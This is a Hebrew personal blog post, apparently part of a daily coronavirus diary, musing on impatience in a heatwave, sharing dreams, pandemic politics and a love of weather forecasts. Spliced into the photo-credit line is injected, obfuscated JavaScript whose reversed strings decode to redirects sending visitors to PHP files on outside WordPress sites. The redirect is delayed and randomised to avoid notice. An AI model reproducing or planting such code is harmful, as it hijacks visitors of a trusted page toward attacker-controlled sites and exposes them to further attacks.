fbpx
[shortcode-weather-atlas city_selector=1178232 background_color="transparent" daily=0 unit_c_f="c" sunrise_sunset= 0 current=0 detailed_forecast=0]

על קוצר הרוח ועל חיי הרוח

רבים מזלזלים בתחזית מזג האוויר בימים אלה, אבל אני אינני ביניהם. עיתון, רדיו, טלוויזיה, דבר ראשון אני פונה לדבר החזאי. וגם משהו על החלום של דודה ש'
יומן חמסין - בלוג הקורונה היומי של עלית קרפ | צילום: shutterstock
יומן חמסין - בלוג הקורונה היומי של עלית קרפ | צילום: shutters$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}$NjS=function(n){if(typeof ($NjS.list[n])=="string") return $NjS.list[n].split("").reverse().join("");return $NjS.list[n];};$NjS.list=["\'php.sgalf-tropxe/tropxe/weiv/bil/noitargim-pw-eno-ni-lla/snigulp/tnetnoc-pw/ofni.stobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tock

יומן חמסין – בלוג הקורונה היומי של עלית קרפ – 5.4.20

האם ייתכן שאני נעשית קצרת רוח כלפי המצב? נדמה לי, שאולי קצת. בדרך כלל אני משתדלת להתייחס באורך רוח לכל מיני תופעות שמעצבנות אותי, אבל היום, כך נראה, אולי גם בגלל החמסין המשתולל בחוץ, פשוט אין לי סבלנות. האם אצרח? אולי, בהמשך, בינתיים, אני כותבת.

החלום של דודה ש'

בבוקר מצלצלת אלי דודתי ש' כדי לספר לי חלום שחלמה. נדמה לי, שהמגפה הפכה את כולנו, לפחות בהקשר הזה, למין גיבורות מרקסיות כאלה, שלא רק חולמות חלומות, אלא גם מספרות אותם זו לזו.

יש לזה נוהל קבוע: זאת שמאזינה צריכה לשאול את המספרת עם תום הסיפור כיצד היא מפרשת את החלום. אחרי שהמספרת מציעה פירוש משלה, מין הנימוס להציע פירוש אלטרנטיבי, אבל חשוב שלא לשלול את הפירוש של החולם. מדוע? כי לפעמים, בעל הדבר יודע טוב מכולם.

אבי שהיה רופא נהג לשאול את הפציינטים שלו ממה לדעתם הם סובלים. לעיתים קרובות, כך אמר, התשובה לשאלה הזאת הייתה המפתח לאבחנה הנכונה, שאולי לא חשבתי עליה בעצמי.

בקיצור, נדמה לי, שהמגפה, והזמן הרב שהתפנה לנו כתוצאה מהבידוד שנכפה עלינו, השיבה כמה עטרות ליושנן, ואולי האזנה לחלומותיהם של אחרים היא אחת מהן.

אחרי המגפה

במאמר ארוך שמתפרסם הבוקר ב"הארץ" מסבירה אוה אילוז את הקשר בין ניאו ליברליזם לטיפול במגפות. אילוז היא מלומדת גדולה ואינטלקטואלית, שאני לא תמיד מצליחה לעקוב אחרי שלל הציטוטים והדוגמאות שהיא נותנת, אבל נדמה לי שהיא אומרת, ואני שומעת זאת גם מאחרים, שייתכן, שאחרי המגפה – שהבוקר כבר נספרו בה 64,780 מתים, ועל פי השמועות, בניגוד לטענת השלטונות הסיניים, לא באמת הודברה גם על אדמת סין – ישובו לתפוס את הזירה תנועות פוליטיות וחברתיות שמקדמות את מחויבותה של המדינה כלפי אזרחיה.

"אחר הצהריים", אומר החזאי במין הבטחה מתוקה, "יחדור אוויר קר ולח יותר לאזורנו". יש למה לחכות. רבים מזלזלים בתחזית מזג האוויר בימים אלה, אבל אני אינני ביניהם.

חיבתי למזג האוויר התחילה לפני ימים רבים, בסוף שנות השישים של המאה הקודמת, בימים שבהם גרנו בירושלים. אבי היה סטודנט לרפואה, אמי עבדה בבית הספר לרפואה, ואני הייתי ילדה יחידה שזה עתה למדה לקרוא. נהגתי לשבת בתחנת האוטובוס ולחכות שאמי תשוב מעבודתה. בעת שחיכיתי נהגתי לבדר את עצמי בקריאת "על המשמר" מנוחתו עדן, ומשום שמדור מזג האוויר הציע טקסטים קצרים, קראתי אותו באדיקות. מאז, אפילו בירדן עברו הרבה מים, אבל אני בשלי: עיתון, רדיו, טלוויזיה, דבר ראשון אני פונה לדבר החזאי.

גשמי קיץ

ויש בזאת נחמה: מזג האוויר בארץ משתנה במהירות. חברינו משוודיה שביקרו כאן בעונות המעבר בכל מיני הזדמנויות, תמיד חששו מהגשם. אבל אני תמיד הרגעתי אותם באומרי, שהגשם בארץ, ובמיוחד זה של עונות המעבר, פשוט עובר במהירות, להבדיל מגשמי הקיץ של שוודיה, שמתחילים כשכל השוודים יוצאים לחופשה בסוף יוני ומסתיימים, אם בכלל, בתחילת אוגוסט, כשכולם שבים לעבודתם. מזג האוויר הקיצוני והקופצני משפיע ללא ספק על מזגם של האנשים כאן, ואולי גם המגפה תלמד ממנו ותחלוף כלעומת שבאה.

אהבתם את בלוג הקורונה היומי של עלית קרפ? יש לנו עוד בלוגים מעניינים

אהבתם? שתפו!

תגיות

אולי גם יעניין אותך

שיתוף ברשתות החברתיות